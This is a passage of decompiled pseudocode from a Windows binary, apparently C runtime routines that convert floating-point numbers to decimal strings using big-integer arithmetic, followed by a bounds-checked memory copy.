															_v1896 = _t1075;
															__eflags = _t1075 - 0xffffffff;
															if(_t1075 != 0xffffffff) {
																_t998 = _v472;
																continue;
															}
															break;
														}
														_t1132 = _v1892;
														_t1170 = _v1880;
														_t1214 = _v1876;
													}
													__eflags = _t1214;
													if(_t1214 != 0) {
														__eflags = 0;
														memset( &_v468, 0, _t1214 << 2);
														_t1227 =  &(_t1227[3]);
														_t1170 = _v1880;
													}
													_t1002 = 0x1cc;
													__eflags = _v1868 - _t1170;
													if(_v1868 <= _t1170) {
														_v472 = _t1132;
													} else {
														_v472 = _t1132 + 1;
													}
												}
											}
											_v1392 = _v1392 & 0x00000000;
											_v1396 = 2;
											_v1400 = 1;
											_v936 = 1;
											_push(4);
										} else {
											_t1081 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *((intOrPtr*)(_t1222 + _t1081 - 0x570)) -  *((intOrPtr*)(_t1222 + _t1081 - 0x1d0));
												if( *((intOrPtr*)(_t1222 + _t1081 - 0x570)) !=  *((intOrPtr*)(_t1222 + _t1081 - 0x1d0))) {
													goto L60;
												}
												_t1081 = _t1081 + 4;
												__eflags = _t1081 - 8;
												if(_t1081 != 8) {
													continue;
												} else {
													_t968 = _t1098 - 0x431;
													_t969 = _t968 & 0x0000001f;
													_t1218 = _t968 >> 5;
													_v1868 = _t969;
													_v1872 = _t1218;
													_v1908 = _t1147 - _t969;
													_t972 = E00CFC1C0(1, _t1147 - _t969, 0);
													_t1084 =  *((intOrPtr*)(_t1222 + _t998 * 4 - 0x1d4));
													_t973 = _t972 - 1;
													_t61 =  &_v1912;
													 *_t61 = _v1912 & 0x00000000;
													__eflags =  *_t61;
													asm("bsr ecx, ecx");
													_v1884 = _t973;
													_v1888 =  !_t973;
													if( *_t61 == 0) {
														_t975 = 0;
														__eflags = 0;
													} else {
														_t975 = _t1084 + 1;
													}
													_t1136 = _t998 + _t1218;
													_t1174 = _t1147 - _t975;
													_v1880 = _t1174;
													_v1896 = _t1136;
													__eflags = _t1136 - 0x73;
													if(_t1136 != 0x73) {
														L35:
														_t1085 = 0;
														__eflags = 0;
													} else {
														__eflags = _v1868 - _t1174;
														if(_v1868 <= _t1174) {
															goto L35;
														} else {
															_t1085 = 1;
														}
													}
													__eflags = _t1136 - 0x73;
													if(_t1136 > 0x73) {
														L57:
														__eflags = 0;
														_t1002 = 0x1cc;
														_push(0);
														_v1400 = 0;
														_v472 = 0;
														_push( &_v1396);
														_push(0x1cc);
														_push( &_v468);
														L316();
														_t1227 =  &(_t1227[4]);
													} else {
														__eflags = _t1085;
														if(_t1085 != 0) {
															goto L57;
														} else {
															__eflags = _t1136 - 0x72;
															if(_t1136 >= 0x72) {
																_t1136 = 0x72;
																_v1896 = _t1136;
															}
															_t1088 = _t1136;
															_v1892 = _t1088;
															__eflags = _t1136 - 0xffffffff;
															if(_t1136 != 0xffffffff) {
																_t1177 = _v1872;
																_t1220 = _t1136 - _t1177;
																__eflags = _t1220;
																_t1138 =  &_v468 + _t1220 * 4;
																while(1) {
																	__eflags = _t1088 - _t1177;
																	if(_t1088 < _t1177) {
																		break;
																	}
																	__eflags = _t1220 - _t998;
																	if(_t1220 >= _t998) {
																		_t983 = 0;
																		__eflags = 0;
																	} else {
																		_t983 =  *_t1138;
																	}
																	_v1876 = _t983;
																	__eflags = _t1220 - 1 - _t998;
																	if(_t1220 - 1 >= _t998) {
																		_t985 = 0;
																		__eflags = 0;
																	} else {
																		_t985 =  *(_t1138 - 4);
																	}
																	_t1138 = _t1138 - 4;
																	_t1093 = _v1892;
																	 *(_t1222 + _t1093 * 4 - 0x1d0) = (_t985 & _v1888) >> _v1908 | (_v1876 & _v1884) << _v1868;
																	_t1088 = _t1093 - 1;
																	_t1220 = _t1220 - 1;
																	_v1892 = _t1088;
																	__eflags = _t1088 - 0xffffffff;
																	if(_t1088 != 0xffffffff) {
																		_t998 = _v472;
																		continue;
																	}
																	break;
																}
																_t1136 = _v1896;
																_t1174 = _v1880;
																_t1218 = _v1872;
															}
															__eflags = _t1218;
															if(_t1218 != 0) {
																__eflags = 0;
																memset( &_v468, 0, _t1218 << 2);
																_t1227 =  &(_t1227[3]);
																_t1174 = _v1880;
															}
															_t1002 = 0x1cc;
															__eflags = _v1868 - _t1174;
															if(_v1868 <= _t1174) {
																_v472 = _t1136;
															} else {
																_v472 = _t1136 + 1;
															}
														}
													}
													_v1392 = _v1392 & 0x00000000;
													_t979 = 4;
													__eflags = 1;
													_v1396 = _t979;
													_v1400 = 1;
													_v936 = 1;
													_push(_t979);
												}
												goto L59;
											}
											goto L60;
										}
										L59:
										_push( &_v1396);
										_push(_t1002);
										_push( &_v932);
										L316();
										_t1232 =  &(_t1227[4]);
									}
									_t784 = _v1900;
									_t1041 = 0xa;
									_v1888 = _t1041;
									__eflags = _t784;
									if(_t784 < 0) {
										_t785 =  ~_t784;
										_t786 = _t785 / _t1041;
										_v1892 = _t786;
										_t1042 = _t785 % _t1041;
										_v1912 = _t1042;
										__eflags = _t786;
										if(_t786 == 0) {
											L250:
											__eflags = _t1042;
											if(_t1042 != 0) {
												_t822 =  *(0xd068e4 + _t1042 * 4);
												_v1912 = _t822;
												__eflags = _t822;
												if(_t822 == 0) {
													L261:
													__eflags = 0;
													_push(0);
													_v472 = 0;
													_v2408 = 0;
													goto L262;
												} else {
													__eflags = _t822 - 1;
													if(_t822 != 1) {
														_t1053 = _v472;
														__eflags = _t1053;
														if(_t1053 != 0) {
															_t1156 = 0;
															_t1196 = 0;
															__eflags = 0;
															do {
																_t1111 = _t822 *  *(_t1222 + _t1196 * 4 - 0x1d0) >> 0x20;
																 *(_t1222 + _t1196 * 4 - 0x1d0) = _t822 *  *(_t1222 + _t1196 * 4 - 0x1d0) + _t1156;
																_t822 = _v1912;
																asm("adc edx, 0x0");
																_t1196 = _t1196 + 1;
																_t1156 = _t1111;
																__eflags = _t1196 - _t1053;
															} while (_t1196 != _t1053);
															__eflags = _t1156;
															if(_t1156 != 0) {
																_t828 = _v472;
																__eflags = _t828 - 0x73;
																if(_t828 >= 0x73) {
																	goto L261;
																} else {
																	 *(_t1222 + _t828 * 4 - 0x1d0) = _t1156;
																	_v472 = _v472 + 1;
																}
															}
														}
													}
												}
											}
										} else {
											do {
												__eflags = _t786 - 0x26;
												if(_t786 > 0x26) {
													_t786 = 0x26;
												}
												_t1054 =  *(0xd0684e + _t786 * 4) & 0x000000ff;
												_v1868 = _t786;
												_v1400 = ( *(0xd0684e + _t786 * 4) & 0x000000ff) + ( *(0xd0684f + _t786 * 4) & 0x000000ff);
												E00CC1E00(_t1054 << 2,  &_v1396, 0, _t1054 << 2);
												_t839 = E00CBF960( &(( &_v1396)[_t1054]), 0xd05f48 + ( *(0xd0684c + _v1868 * 4) & 0x0000ffff) * 4, ( *(0xd0684f + _t786 * 4) & 0x000000ff) << 2);
												_t1159 = _v1400;
												_t1232 =  &(_t1232[6]);
												__eflags = _t1159 - 1;
												if(_t1159 > 1) {
													__eflags = _v472 - 1;
													if(_v472 > 1) {
														__eflags = _t1159 - _v472;
														_t1112 =  &_v1396;
														_t502 = _t1159 - _v472 > 0;
														__eflags = _t502;
														_t840 = _t839 & 0xffffff00 | _t502;
														if(_t502 >= 0) {
															_t1112 =  &_v468;
														}
														_v1876 = _t1112;
														_t1055 =  &_v468;
														__eflags = _t840;
														if(_t840 == 0) {
															_t1055 =  &_v1396;
														}
														_v1908 = _t1055;
														__eflags = _t840;
														if(_t840 == 0) {
															_t1056 = _v472;
															_v1896 = _t1056;
														} else {
															_t1056 = _t1159;
															_v1896 = _t1159;
														}
														__eflags = _t840;
														if(_t840 != 0) {
															_t1159 = _v472;
														}
														_t841 = 0;
														_t1198 = 0;
														_v1864 = 0;
														__eflags = _t1056;
														if(_t1056 == 0) {
															L244:
															_v472 = _t841;
															_t842 = _t841 << 2;
															__eflags = _t842;
															_push(_t842);
															_t843 =  &_v1860;
															goto L245;
														} else {
															do {
																__eflags =  *(_t1112 + _t1198 * 4);
																if( *(_t1112 + _t1198 * 4) != 0) {
																	_t1115 = 0;
																	_t1057 = _t1198;
																	_v1880 = _v1880 & 0;
																	_v1872 = 0;
																	__eflags = _t1159;
																	if(_t1159 == 0) {
																		L241:
																		__eflags = _t1057 - 0x73;
																		if(_t1057 == 0x73) {
																			goto L259;
																		} else {
																			_t1056 = _v1896;
																			_t1112 = _v1876;
																			goto L243;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1057 - 0x73;
																			if(_t1057 == 0x73) {
																				goto L236;
																			}
																			__eflags = _t1057 - _t841;
																			if(_t1057 == _t841) {
																				 *(_t1222 + _t1057 * 4 - 0x740) =  *(_t1222 + _t1057 * 4 - 0x740) & 0x00000000;
																				_t859 = _v1880 + 1 + _t1198;
																				__eflags = _t859;
																				_v1864 = _t859;
																			}
																			_t852 =  *(_v1908 + _v1880 * 4);
																			_t1117 = _v1876;
																			_t1115 = _t852 *  *(_t1117 + _t1198 * 4) >> 0x20;
																			asm("adc edx, 0x0");
																			 *(_t1222 + _t1057 * 4 - 0x740) =  *(_t1222 + _t1057 * 4 - 0x740) + _t852 *  *(_t1117 + _t1198 * 4) + _v1872;
																			asm("adc edx, 0x0");
																			_t856 = _v1880 + 1;
																			_t1057 = _t1057 + 1;
																			_v1880 = _t856;
																			__eflags = _t856 - _t1159;
																			_v1872 = _t1115;
																			_t841 = _v1864;
																			_v1928 = _t1115;
																			if(_t856 != _t1159) {
																				continue;
																			} else {
																				goto L236;
																			}
																			while(1) {
																				L236:
																				__eflags = _t1115;
																				if(_t1115 == 0) {
																					goto L241;
																				}
																				__eflags = _t1057 - 0x73;
																				if(_t1057 == 0x73) {
																					goto L259;
																				} else {
																					__eflags = _t1057 - _t841;
																					if(_t1057 == _t841) {
																						_t559 = _t1222 + _t1057 * 4 - 0x740;
																						 *_t559 =  *(_t1222 + _t1057 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t559;
																						_t565 = _t1057 + 1; // 0x1
																						_v1864 = _t565;
																					}
																					_t850 = _t1115;
																					_t1115 = 0;
																					 *(_t1222 + _t1057 * 4 - 0x740) =  *(_t1222 + _t1057 * 4 - 0x740) + _t850;
																					_t841 = _v1864;
																					asm("adc edx, edx");
																					_t1057 = _t1057 + 1;
																					continue;
																				}
																				goto L247;
																			}
																			goto L241;
																		}
																		goto L236;
																	}
																} else {
																	__eflags = _t1198 - _t841;
																	if(_t1198 == _t841) {
																		 *(_t1222 + _t1198 * 4 - 0x740) =  *(_t1222 + _t1198 * 4 - 0x740) & 0x00000000;
																		_t521 = _t1198 + 1; // 0x1
																		_t841 = _t521;
																		_v1864 = _t841;
																	}
																	goto L243;
																}
																goto L247;
																L243:
																_t1198 = _t1198 + 1;
																__eflags = _t1198 - _t1056;
															} while (_t1198 != _t1056);
															goto L244;
														}
													} else {
														_t1199 = _v468;
														_push(_t1159 << 2);
														_v1928 = _t1199;
														_push( &_v1396);
														_v472 = _t1159;
														_push(_t1002);
														_push( &_v468);
														L316();
														_t1232 =  &(_t1232[4]);
														__eflags = _t1199;
														if(_t1199 == 0) {
															goto L203;
														} else {
															__eflags = _t1199 - 1;
															if(_t1199 == 1) {
																goto L246;
															} else {
																__eflags = _v472;
																if(_v472 == 0) {
																	goto L246;
																} else {
																	_t1058 = 0;
																	_t1160 = _v1928;
																	_t1200 = 0;
																	__eflags = 0;
																	_t1010 = _v472;
																	do {
																		_t867 = _t1160;
																		_t1113 = _t867 *  *(_t1222 + _t1200 * 4 - 0x1d0) >> 0x20;
																		 *(_t1222 + _t1200 * 4 - 0x1d0) = _t867 *  *(_t1222 + _t1200 * 4 - 0x1d0) + _t1058;
																		asm("adc edx, 0x0");
																		_t1200 = _t1200 + 1;
																		_t1058 = _t1113;
																		__eflags = _t1200 - _t1010;
																	} while (_t1200 != _t1010);
																	goto L208;
																}
															}
														}
													}
												} else {
													_t1161 = _v1396;
													__eflags = _t1161;
													if(_t1161 != 0) {
														__eflags = _t1161 - 1;
														if(_t1161 == 1) {
															goto L246;
														} else {
															__eflags = _v472;
															if(_v472 == 0) {
																goto L246;
															} else {
																_t1059 = 0;
																_t1201 = 0;
																__eflags = 0;
																_t1009 = _v472;
																do {
																	_t872 = _t1161;
																	_t1114 = _t872 *  *(_t1222 + _t1201 * 4 - 0x1d0) >> 0x20;
																	 *(_t1222 + _t1201 * 4 - 0x1d0) = _t872 *  *(_t1222 + _t1201 * 4 - 0x1d0) + _t1059;
																	asm("adc edx, 0x0");
																	_t1201 = _t1201 + 1;
																	_t1059 = _t1114;
																	__eflags = _t1201 - _t1009;
																} while (_t1201 != _t1009);
																L208:
																_t1002 = 0x1cc;
																__eflags = _t1058;
																if(_t1058 == 0) {
																	goto L246;
																} else {
																	_t870 = _v472;
																	__eflags = _t870 - 0x73;
																	if(_t870 >= 0x73) {
																		L259:
																		_push(0);
																		_v2408 = 0;
																		_v472 = 0;
																		_push( &_v2404);
																		_push(_t1002);
																		_push( &_v468);
																		L316();
																		_t1232 =  &(_t1232[4]);
																		_t845 = 0;
																	} else {
																		 *(_t1222 + _t870 * 4 - 0x1d0) = _t1058;
																		_v472 = _v472 + 1;
																		goto L246;
																	}
																}
															}
														}
													} else {
														L203:
														_v2408 = 0;
														_v472 = 0;
														_push(0);
														_t843 =  &_v2404;
														L245:
														_push(_t843);
														_push(_t1002);
														_push( &_v468);
														L316();
														_t1232 =  &(_t1232[4]);
														L246:
														_t845 = 1;
													}
												}
												L247:
												__eflags = _t845;
												if(_t845 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_v472 = _v472 & 0x00000000;
													_push(0);
													L262:
													_push( &_v2404);
													_t825 =  &_v468;
													goto L263;
												} else {
													goto L248;
												}
												goto L264;
												L248:
												_t786 = _v1892 - _v1868;
												__eflags = _t786;
												_v1892 = _t786;
											} while (_t786 != 0);
											_t1042 = _v1912;
											goto L250;
										}
									} else {
										_t875 = _t784 / _t1041;
										_v1908 = _t875;
										_t1060 = _t784 % _t1041;
										_v1928 = _t1060;
										__eflags = _t875;
										if(_t875 == 0) {
											L184:
											__eflags = _t1060;
											if(_t1060 != 0) {
												_t876 =  *(0xd068e4 + _t1060 * 4);
												_v1928 = _t876;
												__eflags = _t876;
												if(_t876 != 0) {
													__eflags = _t876 - 1;
													if(_t876 != 1) {
														_t1061 = _v936;
														__eflags = _t1061;
														if(_t1061 != 0) {
															_t1162 = 0;
															_t1202 = 0;
															__eflags = 0;
															do {
																_t1119 = _t876 *  *(_t1222 + _t1202 * 4 - 0x3a0) >> 0x20;
																 *(_t1222 + _t1202 * 4 - 0x3a0) = _t876 *  *(_t1222 + _t1202 * 4 - 0x3a0) + _t1162;
																_t876 = _v1928;
																asm("adc edx, 0x0");
																_t1202 = _t1202 + 1;
																_t1162 = _t1119;
																__eflags = _t1202 - _t1061;
															} while (_t1202 != _t1061);
															__eflags = _t1162;
															if(_t1162 != 0) {
																_t879 = _v936;
																__eflags = _t879 - 0x73;
																if(_t879 >= 0x73) {
																	goto L186;
																} else {
																	 *(_t1222 + _t879 * 4 - 0x3a0) = _t1162;
																	_v936 = _v936 + 1;
																}
															}
														}
													}
												} else {
													L186:
													_v2408 = 0;
													_v936 = 0;
													_push(0);
													goto L190;
												}
											}
										} else {
											do {
												__eflags = _t875 - 0x26;
												if(_t875 > 0x26) {
													_t875 = 0x26;
												}
												_t1062 =  *(0xd0684e + _t875 * 4) & 0x000000ff;
												_v1876 = _t875;
												_v1400 = ( *(0xd0684e + _t875 * 4) & 0x000000ff) + ( *(0xd0684f + _t875 * 4) & 0x000000ff);
												E00CC1E00(_t1062 << 2,  &_v1396, 0, _t1062 << 2);
												_t892 = E00CBF960( &(( &_v1396)[_t1062]), 0xd05f48 + ( *(0xd0684c + _v1876 * 4) & 0x0000ffff) * 4, ( *(0xd0684f + _t875 * 4) & 0x000000ff) << 2);
												_t1165 = _v1400;
												_t1232 =  &(_t1232[6]);
												__eflags = _t1165 - 1;
												if(_t1165 > 1) {
													__eflags = _v936 - 1;
													if(_v936 > 1) {
														__eflags = _t1165 - _v936;
														_t1120 =  &_v1396;
														_t314 = _t1165 - _v936 > 0;
														__eflags = _t314;
														_t893 = _t892 & 0xffffff00 | _t314;
														if(_t314 >= 0) {
															_t1120 =  &_v932;
														}
														_v1868 = _t1120;
														_t1063 =  &_v932;
														__eflags = _t893;
														if(_t893 == 0) {
															_t1063 =  &_v1396;
														}
														_v1872 = _t1063;
														__eflags = _t893;
														if(_t893 == 0) {
															_t1064 = _v936;
															_v1892 = _t1064;
														} else {
															_t1064 = _t1165;
															_v1892 = _t1165;
														}
														__eflags = _t893;
														if(_t893 != 0) {
															_t1165 = _v936;
														}
														_t894 = 0;
														_t1204 = 0;
														_v1864 = 0;
														__eflags = _t1064;
														if(_t1064 == 0) {
															L177:
															_v936 = _t894;
															_t895 = _t894 << 2;
															__eflags = _t895;
															goto L178;
														} else {
															do {
																__eflags =  *(_t1120 + _t1204 * 4);
																if( *(_t1120 + _t1204 * 4) != 0) {
																	_t1123 = 0;
																	_t1065 = _t1204;
																	_v1880 = _v1880 & 0;
																	_v1896 = 0;
																	__eflags = _t1165;
																	if(_t1165 == 0) {
																		L174:
																		__eflags = _t1065 - 0x73;
																		if(_t1065 == 0x73) {
																			goto L187;
																		} else {
																			_t1064 = _v1892;
																			_t1120 = _v1868;
																			goto L176;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1065 - 0x73;
																			if(_t1065 == 0x73) {
																				goto L169;
																			}
																			__eflags = _t1065 - _t894;
																			if(_t1065 == _t894) {
																				 *(_t1222 + _t1065 * 4 - 0x740) =  *(_t1222 + _t1065 * 4 - 0x740) & 0x00000000;
																				_t912 = _v1880 + 1 + _t1204;
																				__eflags = _t912;
																				_v1864 = _t912;
																			}
																			_t905 =  *(_v1872 + _v1880 * 4);
																			_t1125 = _v1868;
																			_t1123 = _t905 *  *(_t1125 + _t1204 * 4) >> 0x20;
																			asm("adc edx, 0x0");
																			 *(_t1222 + _t1065 * 4 - 0x740) =  *(_t1222 + _t1065 * 4 - 0x740) + _t905 *  *(_t1125 + _t1204 * 4) + _v1896;
																			asm("adc edx, 0x0");
																			_t909 = _v1880 + 1;
																			_t1065 = _t1065 + 1;
																			_v1880 = _t909;
																			__eflags = _t909 - _t1165;
																			_v1896 = _t1123;
																			_t894 = _v1864;
																			_v1912 = _t1123;
																			if(_t909 != _t1165) {
																				continue;
																			} else {
																				goto L169;
																			}
																			while(1) {
																				L169:
																				__eflags = _t1123;
																				if(_t1123 == 0) {
																					goto L174;
																				}
																				__eflags = _t1065 - 0x73;
																				if(_t1065 == 0x73) {
																					L187:
																					__eflags = 0;
																					_v2408 = 0;
																					_v936 = 0;
																					_push(0);
																					_t901 =  &_v2404;
																					goto L188;
																				} else {
																					__eflags = _t1065 - _t894;
																					if(_t1065 == _t894) {
																						_t371 = _t1222 + _t1065 * 4 - 0x740;
																						 *_t371 =  *(_t1222 + _t1065 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t371;
																						_t377 = _t1065 + 1; // 0x1
																						_v1864 = _t377;
																					}
																					_t903 = _t1123;
																					_t1123 = 0;
																					 *(_t1222 + _t1065 * 4 - 0x740) =  *(_t1222 + _t1065 * 4 - 0x740) + _t903;
																					_t894 = _v1864;
																					asm("adc edx, edx");
																					_t1065 = _t1065 + 1;
																					continue;
																				}
																				goto L181;
																			}
																			goto L174;
																		}
																		goto L169;
																	}
																} else {
																	__eflags = _t1204 - _t894;
																	if(_t1204 == _t894) {
																		 *(_t1222 + _t1204 * 4 - 0x740) =  *(_t1222 + _t1204 * 4 - 0x740) & 0x00000000;
																		_t333 = _t1204 + 1; // 0x1
																		_t894 = _t333;
																		_v1864 = _t894;
																	}
																	goto L176;
																}
																goto L181;
																L176:
																_t1204 = _t1204 + 1;
																__eflags = _t1204 - _t1064;
															} while (_t1204 != _t1064);
															goto L177;
														}
													} else {
														_t1205 = _v932;
														_push(_t1165 << 2);
														_v1884 = _t1205;
														_push( &_v1396);
														_v936 = _t1165;
														_push(_t1002);
														_push( &_v932);
														L316();
														_t1232 =  &(_t1232[4]);
														__eflags = _t1205;
														if(_t1205 != 0) {
															__eflags = _t1205 - 1;
															if(_t1205 == 1) {
																goto L180;
															} else {
																__eflags = _v936;
																if(_v936 == 0) {
																	goto L180;
																} else {
																	_t1066 = 0;
																	_t1166 = _v1884;
																	_t1206 = 0;
																	__eflags = 0;
																	_t1012 = _v936;
																	do {
																		_t919 = _t1166;
																		_t1121 = _t919 *  *(_t1222 + _t1206 * 4 - 0x3a0) >> 0x20;
																		 *(_t1222 + _t1206 * 4 - 0x3a0) = _t919 *  *(_t1222 + _t1206 * 4 - 0x3a0) + _t1066;
																		asm("adc edx, 0x0");
																		_t1206 = _t1206 + 1;
																		_t1066 = _t1121;
																		__eflags = _t1206 - _t1012;
																	} while (_t1206 != _t1012);
																	goto L148;
																}
															}
														} else {
															_v1400 = 0;
															_v936 = 0;
															_push(0);
															_t896 =  &_v1396;
															goto L179;
														}
													}
												} else {
													_t1167 = _v1396;
													__eflags = _t1167;
													if(_t1167 != 0) {
														__eflags = _t1167 - 1;
														if(_t1167 == 1) {
															goto L180;
														} else {
															__eflags = _v936;
															if(_v936 == 0) {
																goto L180;
															} else {
																_t1067 = 0;
																_t1207 = 0;
																__eflags = 0;
																_t1011 = _v936;
																do {
																	_t926 = _t1167;
																	_t1122 = _t926 *  *(_t1222 + _t1207 * 4 - 0x3a0) >> 0x20;
																	 *(_t1222 + _t1207 * 4 - 0x3a0) = _t926 *  *(_t1222 + _t1207 * 4 - 0x3a0) + _t1067;
																	asm("adc edx, 0x0");
																	_t1207 = _t1207 + 1;
																	_t1067 = _t1122;
																	__eflags = _t1207 - _t1011;
																} while (_t1207 != _t1011);
																L148:
																_t1002 = 0x1cc;
																__eflags = _t1066;
																if(_t1066 == 0) {
																	goto L180;
																} else {
																	_t922 = _v936;
																	__eflags = _t922 - 0x73;
																	if(_t922 < 0x73) {
																		 *(_t1222 + _t922 * 4 - 0x3a0) = _t1066;
																		_v936 = _v936 + 1;
																		goto L180;
																	} else {
																		_v1400 = 0;
																		_v936 = 0;
																		_push(0);
																		_t901 =  &_v1396;
																		L188:
																		_push(_t901);
																		_push(_t1002);
																		_push( &_v932);
																		L316();
																		_t1232 =  &(_t1232[4]);
																		_t898 = 0;
																	}
																}
															}
														}
													} else {
														_t895 = 0;
														_v1864 = 0;
														_v936 = 0;
														L178:
														_push(_t895);
														_t896 =  &_v1860;
														L179:
														_push(_t896);
														_push(_t1002);
														_push( &_v932);
														L316();
														_t1232 =  &(_t1232[4]);
														L180:
														_t898 = 1;
													}
												}
												L181:
												__eflags = _t898;
												if(_t898 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_t406 =  &_v936;
													 *_t406 = _v936 & 0x00000000;
													__eflags =  *_t406;
													_push(0);
													L190:
													_push( &_v2404);
													_t825 =  &_v932;
													L263:
													_push(_t1002);
													_push(_t825);
													L316();
													_t1232 =  &(_t1232[4]);
												} else {
													goto L182;
												}
												goto L264;
												L182:
												_t875 = _v1908 - _v1876;
												__eflags = _t875;
												_v1908 = _t875;
											} while (_t875 != 0);
											_t1060 = _v1928;
											goto L184;
										}
									}
									L264:
									_t1151 = _v1904;
									_t1193 = _t1151;
									_t1043 = _v472;
									_v1876 = _t1193;
									__eflags = _t1043;
									if(_t1043 != 0) {
										_t1195 = 0;
										_t1155 = 0;
										__eflags = 0;
										_t1007 = 0xa;
										do {
											_t815 =  *(_t1222 + _t1155 * 4 - 0x1d0);
											_t1110 = _t815 * _t1007 >> 0x20;
											 *(_t1222 + _t1155 * 4 - 0x1d0) = _t815 * _t1007 + _t1195;
											asm("adc edx, 0x0");
											_t1155 = _t1155 + 1;
											_t1195 = _t1110;
											__eflags = _t1155 - _t1043;
										} while (_t1155 != _t1043);
										_v1912 = _t1195;
										__eflags = _t1195;
										_t1193 = _v1876;
										if(_t1195 != 0) {
											_t1052 = _v472;
											__eflags = _t1052 - 0x73;
											if(_t1052 >= 0x73) {
												__eflags = 0;
												_push(0);
												_v2408 = 0;
												_v472 = 0;
												_push( &_v2404);
												_push(0x1cc);
												_push( &_v468);
												L316();
												_t1232 =  &(_t1232[4]);
											} else {
												 *(_t1222 + _t1052 * 4 - 0x1d0) = _t1110;
												_v472 = _v472 + 1;
											}
										}
										_t1151 = _t1193;
									}
									_t789 = E00CF16A0( &_v472,  &_v936);
									__eflags = _t789 - 0xa;
									if(_t789 != 0xa) {
										__eflags = _t789;
										if(_t789 != 0) {
											_t790 = _t789 + 0x30;
											__eflags = _t790;
											_t1193 = _t1151 + 1;
											 *_t1151 = _t790;
											goto L283;
										} else {
											_t791 = _v1900 - 1;
										}
									} else {
										_v1900 = _v1900 + 1;
										_t1193 = _t1151 + 1;
										_t807 = _v936;
										 *_t1151 = 0x31;
										_v1876 = _t1193;
										__eflags = _t807;
										if(_t807 != 0) {
											_t1154 = 0;
											_t1194 = _t807;
											_t1051 = 0;
											__eflags = 0;
											_t1005 = 0xa;
											do {
												_t808 =  *(_t1222 + _t1051 * 4 - 0x3a0);
												 *(_t1222 + _t1051 * 4 - 0x3a0) = _t808 * _t1005 + _t1154;
												asm("adc edx, 0x0");
												_t1051 = _t1051 + 1;
												_t1154 = _t808 * _t1005 >> 0x20;
												__eflags = _t1051 - _t1194;
											} while (_t1051 != _t1194);
											_t1193 = _v1876;
											__eflags = _t1154;
											if(_t1154 != 0) {
												_t811 = _v936;
												__eflags = _t811 - 0x73;
												if(_t811 >= 0x73) {
													_push(0);
													_v2408 = 0;
													_v936 = 0;
													_push( &_v2404);
													_push(0x1cc);
													_push( &_v932);
													L316();
													_t1232 =  &(_t1232[4]);
												} else {
													 *(_t1222 + _t811 * 4 - 0x3a0) = _t1154;
													_v936 = _v936 + 1;
												}
											}
										}
										L283:
										_t791 = _v1900;
									}
									 *(_v1924 + 4) = _t791;
									_t1029 = _v1920;
									__eflags = _t791;
									if(_t791 >= 0) {
										__eflags = _t1029 - 0x7fffffff;
										if(_t1029 <= 0x7fffffff) {
											_t1029 = _t1029 + _t791;
											__eflags = _t1029;
										}
									}
									_t793 = _a24 - 1;
									__eflags = _t793 - _t1029;
									if(_t793 >= _t1029) {
										_t793 = _t1029;
									}
									_t794 = _t793 + _v1904;
									_v1920 = _t794;
									__eflags = _t1193 - _t794;
									if(__eflags != 0) {
										while(1) {
											_t795 = _v472;
											__eflags = _t795;
											if(__eflags == 0) {
												goto L304;
											}
											_t1152 = 0;
											_t1003 = _t795;
											_t1047 = 0;
											__eflags = 0;
											do {
												_t796 =  *(_t1222 + _t1047 * 4 - 0x1d0);
												 *(_t1222 + _t1047 * 4 - 0x1d0) = _t796 * 0x3b9aca00 + _t1152;
												asm("adc edx, 0x0");
												_t1047 = _t1047 + 1;
												_t1152 = _t796 * 0x3b9aca00 >> 0x20;
												__eflags = _t1047 - _t1003;
											} while (_t1047 != _t1003);
											__eflags = _t1152;
											if(_t1152 != 0) {
												_t802 = _v472;
												__eflags = _t802 - 0x73;
												if(_t802 >= 0x73) {
													__eflags = 0;
													_push(0);
													_v2408 = 0;
													_v472 = 0;
													_push( &_v2404);
													_push(0x1cc);
													_push( &_v468);
													L316();
													_t1232 =  &(_t1232[4]);
												} else {
													 *(_t1222 + _t802 * 4 - 0x1d0) = _t1152;
													_v472 = _v472 + 1;
												}
											}
											_t801 = E00CF16A0( &_v472,  &_v936);
											_t1153 = 8;
											_t1029 = _v1920 - _t1193;
											__eflags = _t1029;
											do {
												_t707 = _t801 % _v1888;
												_t801 = _t801 / _v1888;
												_t1108 = _t707 + 0x30;
												__eflags = _t1029 - _t1153;
												if(_t1029 >= _t1153) {
													 *((char*)(_t1153 + _t1193)) = _t1108;
												}
												_t1153 = _t1153 - 1;
												__eflags = _t1153 - 0xffffffff;
											} while (_t1153 != 0xffffffff);
											__eflags = _t1029 - 9;
											if(_t1029 > 9) {
												_t1029 = 9;
											}
											_t1193 = _t1193 + _t1029;
											__eflags = _t1193 - _v1920;
											if(__eflags != 0) {
												continue;
											}
											goto L304;
										}
									}
									L304:
									 *_t1193 = 0;
									goto L305;
								}
							}
						}
					}
				} else {
					_t1029 = _t1179 & 0x000fffff;
					if((_t993 | _t1179 & 0x000fffff) != 0) {
						goto L12;
					} else {
						_push(0xd0690c);
						_push(_a24);
						 *(_v1924 + 4) =  *(_v1924 + 4) & 0x00000000;
						_push(_t1096);
						L312:
						if(E00CDBF5B() != 0) {
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00CDBE80();
							asm("int3");
							_push(_t1222);
							_push(_t1179);
							_t1180 = _v2424;
							__eflags = _t1180;
							if(_t1180 != 0) {
								_t743 = _v0;
								__eflags = _v0;
								if(__eflags != 0) {
									_push(_t1141);
									_t1142 = _a8;
									__eflags = _t1142;
									if(_t1142 == 0) {
										L323:
										E00CC1E00(_t1142, _t743, 0, _a4);
										__eflags = _t1142;
										if(__eflags != 0) {
											__eflags = _a4 - _t1180;
											if(__eflags >= 0) {
												_t745 = 0x16;
											} else {
												_t746 = E00CDC0C4(__eflags);
												_push(0x22);
												goto L327;
											}
										} else {
											_t746 = E00CDC0C4(__eflags);
											_push(0x16);
											L327:
											_pop(_t1182);
											 *_t746 = _t1182;
											E00CDBE53();
											_t745 = _t1182;
										}
									} else {
										__eflags = _a4 - _t1180;
										if(_a4 < _t1180) {
											goto L323;
										} else {
											E00CBF960(_t743, _t1142, _t1180);
											_t745 = 0;
										}
									}
								} else {
									_t749 = E00CDC0C4(__eflags);
									_t1183 = 0x16;
									 *_t749 = _t1183;
									E00CDBE53();
									_t745 = _t1183;
								}
							} else {
								_t745 = 0;
							}
							return _t745;
						} else {
							L305:
